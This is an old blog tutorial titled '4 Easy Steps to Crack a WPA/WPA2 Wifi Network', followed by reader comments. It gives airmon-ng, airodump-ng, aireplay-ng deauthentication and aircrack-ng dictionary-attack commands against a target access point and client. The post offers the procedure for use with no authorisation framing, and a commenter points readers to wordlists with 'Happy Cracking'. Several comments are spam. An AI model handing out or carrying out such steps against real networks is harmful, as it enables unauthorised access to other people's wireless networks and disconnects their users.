break

4 Easy Steps to Crack a WPA/WPA2 Wifi Network using Ubuntu 7.10

Hi Friends This Is my 2nd Tutorial ,Today i will be Teaching u how to Crack a Wireless WPA / WPA2 TKIP or TKIP+AES Network using Ubuntu 7.10
whats the Difference Between cracking a WPA network and WPA2 network,Nothing !! There is no difference between cracking a WPA or WPA2
networks at all.In order to sucessfully crack any WPA/WPA2 network,there are 2 main things must happen
1) U must capture the Full 4 Way Handshake.
2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce.
We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.

There are a few ways to crack a WPA / WPA2 PSK password this is just one of them.

This method is usally vunerable because of the end user, as most people will use a pass phrase thats easy to remember.
bcz evry body doesnt want to keep long password.

You will need the following details

A Client connected to the AP to Deauth
ESSID = this is the Name of your wireless network i.e MYWIRELESS
BSSID = this is the MAC address of your AP and will be in this format 00:1C:10:26:A9:39 everyone’s is different so make sure you write it down correctly or the following will not work
Channel = This will be the channel your AP is Broadcasting on i.e channel 7
ALSO you will need a decent dictionary file you can find many of these around on the internet google is your friend on this one,

then lets start

below are the Steps

Step 1 – Start the wireless interface in monitor mode

Airmon-ng strat wifi0 (starts ur Interface with Monitor mode)
Airodump-ng ath0 (Monitors the Access point available)

Step 2 – Start airodump-ng to collect authentication handshake

Airodump-ng -c 11 -w psk –bssid 00:1C:10:26:A9:39 ath0

Where:

-c 11 is the channel for the wireless network

- -bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminate extraneous traffic.

-w psk is the file name prefix for the file which will contain the IVs.

ath0 is the interface name.

Important: Do NOT use the ”- -ivs” option. You must capture the full packets.

Step 3 – Use aireplay-ng to deauthenticate the wireless client

aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0

Where:

-0 means deauthentication

3 is the number of deauths to send (you can send muliple if you wish)

-a 00:1C:10:26:A9:39 is the MAC address of the access point

-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing

ath0 is the interface name

Step 4 – Run aircrack-ng to crack the pre-shared key

aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap

Where:

-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.

*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Done now wait for some time It depends upon ur Dictionary file and the passphrase ,

You should now have your PSK passphrase

&<>evilmonkey000<>&

Nothing is Impossible All kind of phassphrasses can be cracked until there is a patch for Human stupidity Bcz now there is no Patch for Human stupidity.

and u can also see my Video below

http://s288.photobucket.com/albums/ll167/3vilmonkey1983/?action=view&current=WPAandWPA2Cracking1.flv

comming soon Next Tutorial on Cracking WPA/WPA2 With Airolib-ng Database for Fast Cracking with Huge Dictionary

Tutorial by
(Wireless Punter)

13 Responses

  1. Sunil Says:

    Nice tut. Keep up the good work ;)

  2. Dictionary » 6 Easy Steps to Crack a WPA/WPA2 Wifi Network using Ubuntu 7.10 Says:

    [...] The Wifi Hack (Wifi Artist) wrote an interesting post today on 6 Easy Steps to Crack a WPA/WPA2 Wifi Network using Ubuntu 7.10Here’s a quick excerpt … hannel = This will be the channel your AP is Broadcasting on i. e channel 7 ALSO you will need a decent dictionary file you can find many of these around on the i…2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce….Done now wait for some time It depends upon ur Dictionary file and the passphrase ,…Step 4 – Run aircrack-ng to crack the pre-shared key aircrack-ng -w dictionary…. [...]

  3. Iceman141 Says:

    Hey Mr “XXx” ;)

    iam still in the Noobie fase, and you are talking about a
    “decent dictionary file” and they are easy to find all around the internet.

    wuld you might give me a little hint of, were or what other keyword i culd use to find a decent dictionary file?

  4. SEO Boot Camp Says:

    I enjoyed your writing style and I’ve added you to my Reader. Keep these posts coming.

  5. ok Says:

    good site gcqdfe

  6. Vertulkqueest Says:

    Nice site thanks!
    simple site.

  7. Vertulkqueest Says:

    Plain sailing

    Chill! I have an information on the the shyla stylez video is well! – Billye Jones

  8. Decipher Says:

    Hey Dude,

    /\/iCE Post!!!

    Can we involve Rainbow tables here somehow for faster crackin
    juz a thought!!

    Cheers

  9. ArianaCymn Says:

    I like your post. Good stuff. Keep them coming :)

  10. Cletus Says:

    Here is a forum where I found a lot of people listing some pretty good word lists that are out there:

    http://www.governmentsecurity.org/forum/index.php?showtopic=6384

    Happy Cracking!

  11. GarykPatton Says:

    I have been looking looking around for this kind of information. Will you post some more in future? I’ll be grateful if you will.

  12. Zio Says:

    hey man thats cool, but where is: Next Tutorial on Cracking WPA/WPA2 With Airolib-ng Database for Fast Cracking with Huge Dictionary :) ))

  13. admin Says:

    soon

Leave a Comment

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.